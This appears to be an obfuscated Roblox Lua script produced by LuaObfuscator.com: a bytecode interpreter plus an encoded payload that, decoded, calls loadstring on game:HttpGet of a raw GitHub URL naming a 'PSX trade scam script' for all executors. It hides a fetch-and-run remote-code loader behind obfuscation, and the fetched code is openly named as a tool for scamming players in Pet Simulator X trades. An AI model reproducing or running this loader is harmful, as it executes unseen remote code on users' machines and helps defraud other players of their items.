--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v93=v5(v81,v19);v19=nil;return v93;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -(877 -(282 + 595)) ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-((2569 -(1523 + 114)) -(857 + 67 + 7)))) + (569 -(367 + 201)))) ;return v83-(v83%1) ;end end else local v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or 0 ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==((1182 -(32 + 85)) -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (606 -(87 + 193 + 70))) + v37 ;end if (v36==(180 -(67 + 113))) then v37,v38=v1(v16,v18,v18 + (959 -(892 + (159 -94))) );v18=v18 + 2 ;v36=(2 + 0) -1 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + 4 ;return (v42 * ((12212644 + 4565524) -(802 + (1147 -(915 + 82))))) + (v41 * (176444 -110908)) + (v40 * (464 -208)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,2 -1 ,12 + 8 ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,47 -26 ,31);local v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -0)) or ((773 -(201 + 571)) + (1138 -(116 + 1022))) ;if (v47==(791 -((1531 -1163) + 423))) then if (v46==(0 -0)) then return v48 * ((11 + 7) -(10 + 8)) ;else local v94=0 -0 ;while true do if (v94==((1613 -1171) -(416 + 26))) then v47=3 -2 ;v45=0 + (0 -0) ;break;end end end elseif (v47==(3621 -1574)) then return ((v46==0) and (v48 * ((439 -(145 + (1152 -(814 + 45))))/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-(2509 -(998 + (1202 -714))) ) * (v45 + (v46/((1 + 1)^(43 + 9)))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v65=886 -(261 + 624) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==(2 -1)) then local v88=0 + 0 ;while true do if (0==v88) then v56={v53,v54,nil,v55};v57=v23();v88=1;end if (v88~=(1 + 0)) then else v58={};v52=576 -(507 + 67) ;break;end end end if (v52~=(0 -0)) then else local v89=0;while true do if (v89==0) then v53={};v54={};v89=1;end if ((167 -(122 + 44))==v89) then v55={};v52=1750 -(1013 + 736) ;break;end end end if (v52~=(3 + 0)) then else local v90=0 -0 ;local v91;while true do if ((0 -0)~=v90) then else v91=0 + 0 ;while true do if (v91==(0 -0)) then local v128=0;while true do if ((0 + 0)==v128) then for v167=1 -0 ,v23() do v54[v167-(66 -(30 + 35)) ]=v28();end return v56;end end end end break;end end end if (v52==(869 -(550 + 317))) then for v95=1 -0 ,v57 do local v96=0 -0 ;local v97;local v98;local v99;while true do if (v96==(2 -1)) then v99=nil;while true do if ((285 -(134 + 151))==v97) then local v132=1665 -(970 + 695) ;while true do if (1~=v132) then else v97=1 -0 ;break;end if (v132==(1990 -(582 + 1408))) then v98=v21();v99=nil;v132=3 -2 ;end end end if (v97==(321 -(53 + 267))) then if (v98==1) then v99=v21()~=(0 -0) ;elseif (v98==2) then v99=v24();elseif (v98==(11 -8)) then v99=v25();end v58[v95]=v99;break;end end break;end if (v96~=(413 -(15 + 398))) then else v97=0;v98=nil;v96=1;end end end v56[1827 -(1195 + 629) ]=v21();for v100=1,v23() do local v101=0;local v102;local v103;local v104;local v105;while true do if (v101==(7 -5)) then while true do if (v102~=(0 -0)) then else local v134=241 -(187 + 54) ;while true do if (v134==1) then v102=1 + 0 ;break;end if ((780 -(162 + 618))==v134) then v103=0;v104=nil;v134=1 + 0 ;end end end if (v102~=1) then else v105=nil;while true do if (1~=v103) then else while true do if (v104~=(0 + 0)) then else v105=v21();if (v20(v105,1,1 + 0 )~=(0 -0)) then else local v171=0;local v172;local v173;local v174;local v175;local v176;while true do if ((1 -0)~=v171) then else v174=nil;v175=nil;v171=740 -(542 + 196) ;end if (v171==(0 + 0)) then v172=1636 -(1373 + 263) ;v173=nil;v171=1 + 0 ;end if (2~=v171) then else v176=nil;while true do if (v172==(1000 -(451 + 549))) then local v178=0;while true do if (v178~=(2 -1)) then else v172=1 + 0 ;break;end if (v178~=(0 -0)) then else v173=0 -0 ;v174=nil;v178=1 -0 ;end end end if (v172~=1) then else v175=nil;v176=nil;v172=1386 -(746 + 638) ;end if (v172==(1 + 1)) then while true do if (v173~=1) then else local v179=0 -0 ;local v180;local v181;while true do if (v179==(342 -(218 + 123))) then while true do if (v180~=0) then else v181=0;while true do if (v181~=(1582 -(1535 + 46))) then else v173=2;break;end if (v181~=(1121 -(118 + 1003))) then else local v194=0;while true do if (v194==0) then v176={v22(),v22(),nil,nil};if (v174==(0 -0)) then local v195=560 -(306 + 254) ;while true do if ((0 + 0)~=v195) then else v176[3]=v22();v176[4]=v22();break;end end elseif (v174==(1 + 0)) then v176[5 -2 ]=v23();elseif (v174==2) then v176[5 -2 ]=v23() -(2^(1483 -(899 + 568))) ;elseif (v174~=3) then else local v200=0 + 0 ;while true do if ((0 + 0)~=v200) then else v176[7 -4 ]=v23() -((605 -(268 + 335))^(10 + 6)) ;v176[8 -4 ]=v22();break;end end end v194=2 -1 ;end if (v194==(291 -(60 + 230))) then v181=573 -(426 + 146) ;break;end end end end break;end end break;end if (v179==(0 + 0)) then v180=1456 -(282 + 1174) ;v181=nil;v179=812 -(569 + 242) ;end end end if (v173~=(8 -5)) then else if (v20(v175,3,1 + 2 )==(754 -(239 + 514))) then v176[4]=v58[v176[2 + 2 ]];end v53[v100]=v176;break;end if (v173~=(1026 -(706 + 318))) then else local v183=1251 -(721 + 530) ;local v184;while true do if (0~=v183) then else v184=1271 -(945 + 326) ;while true do if (v184==(0 -0)) then if (v20(v175,1 + 0 ,1)==(1330 -(797 + 532))) then v176[702 -(271 + 429) ]=v58[v176[2]];end if (v20(v175,2,2)==1) then v176[2 + 1 ]=v58[v176[3 + 0 ]];end v184=1501 -(1408 + 92) ;end if (v184~=(732 -(476 + 255))) then else v173=3;break;end end break;end end end if (v173==(1086 -(461 + 625))) then local v185=1288 -(993 + 295) ;local v186;while true do if (v185~=(1130 -(369 + 761))) then else v186=0;while true do if (v186==(0 + 0)) then local v189=1171 -(418 + 753) ;while true do if (v189==1) then v186=1 -0 ;break;end if (v189~=(0 -0)) then else v174=v20(v105,1 + 1 ,1 + 2 );v175=v20(v105,4,6);v189=1 + 0 ;end end end if ((1 + 0)~=v186) then else v173=530 -(406 + 123) ;break;end end break;end end end end break;end end break;end end end break;end end break;end if (v103~=(1769 -(1749 + 20))) then else local v169=0;local v170;while true do if (v169==(0 + 0)) then v170=1322 -(1249 + 73) ;while true do if (v170==1) then v103=1 + 0 ;break;end if (v170==(1145 -(466 + 679))) then local v177=216 -(42 + 174) ;while true do if (v177~=(2 -1)) then else v170=1;break;end if (v177~=0) then else v104=0 + 0 ;v105=nil;v177=2 -1 ;end end end end break;end end end end break;end end break;end if (v101==(1901 -(106 + 1794))) then v104=nil;v105=nil;v101=2;end if (v101~=(0 + 0)) then else v102=0 + 0 ;v103=nil;v101=1 + 0 ;end end end v52=8 -5 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=3) then if (v80<=1) then if (v80==0) then local v110=v79[2];local v111,v112=v70(v77[v110](v13(v77,v110 + 1 ,v79[3])));v72=(v112 + v110) -1 ;local v113=0;for v129=v110,v72 do v113=v113 + 1 ;v77[v129]=v111[v113];end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80==2) then v77[v79[2]]();else v77[v79[2]]=v79[3];end elseif (v80<=5) then if (v80>4) then local v117=0;local v118;while true do if (v117==0) then v118=v79[2];v77[v118]=v77[v118](v13(v77,v118 + 1 ,v72));break;end end else local v119=0;local v120;local v121;while true do if (1==v119) then v77[v120 + 1 ]=v121;v77[v120]=v121[v79[4]];break;end if (v119==0) then v120=v79[2];v121=v77[v79[3]];v119=1;end end end elseif (v80<=6) then local v122=0;local v123;local v124;local v125;local v126;local v127;while true do if (v122==3) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v122=4;end if (v122==7) then v79=v67[v71];do return;end break;end if (v122==5) then v123=0;for v164=v127,v72 do v123=v123 + 1 ;v77[v164]=v124[v123];end v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v122=6;end if (v122==4) then v71=v71 + 1 ;v79=v67[v71];v127=v79[2];v124,v125=v70(v77[v127](v13(v77,v127 + 1 ,v79[3])));v72=(v125 + v127) -1 ;v122=5;end if (v122==0) then v123=nil;v124,v125=nil;v126=nil;v127=nil;v77[v79[2]]=v61[v79[3]];v122=1;end if (v122==6) then v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v122=7;end if (v122==1) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v122=2;end if (v122==2) then v127=v79[2];v126=v77[v79[3]];v77[v127 + 1 ]=v126;v77[v127]=v126[v79[4]];v71=v71 + 1 ;v122=3;end end elseif (v80==7) then v77[v79[2]]=v61[v79[3]];else do return;end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574037E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F426573742D536372697074732F424553542D5053582D54524144452D5343414D2D5343524950542D574F524B494E472D4F4E2D412O4C2D4558454355544F52532D557064617465642D2F6D61696E2F736F75726365253230636F646500093O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
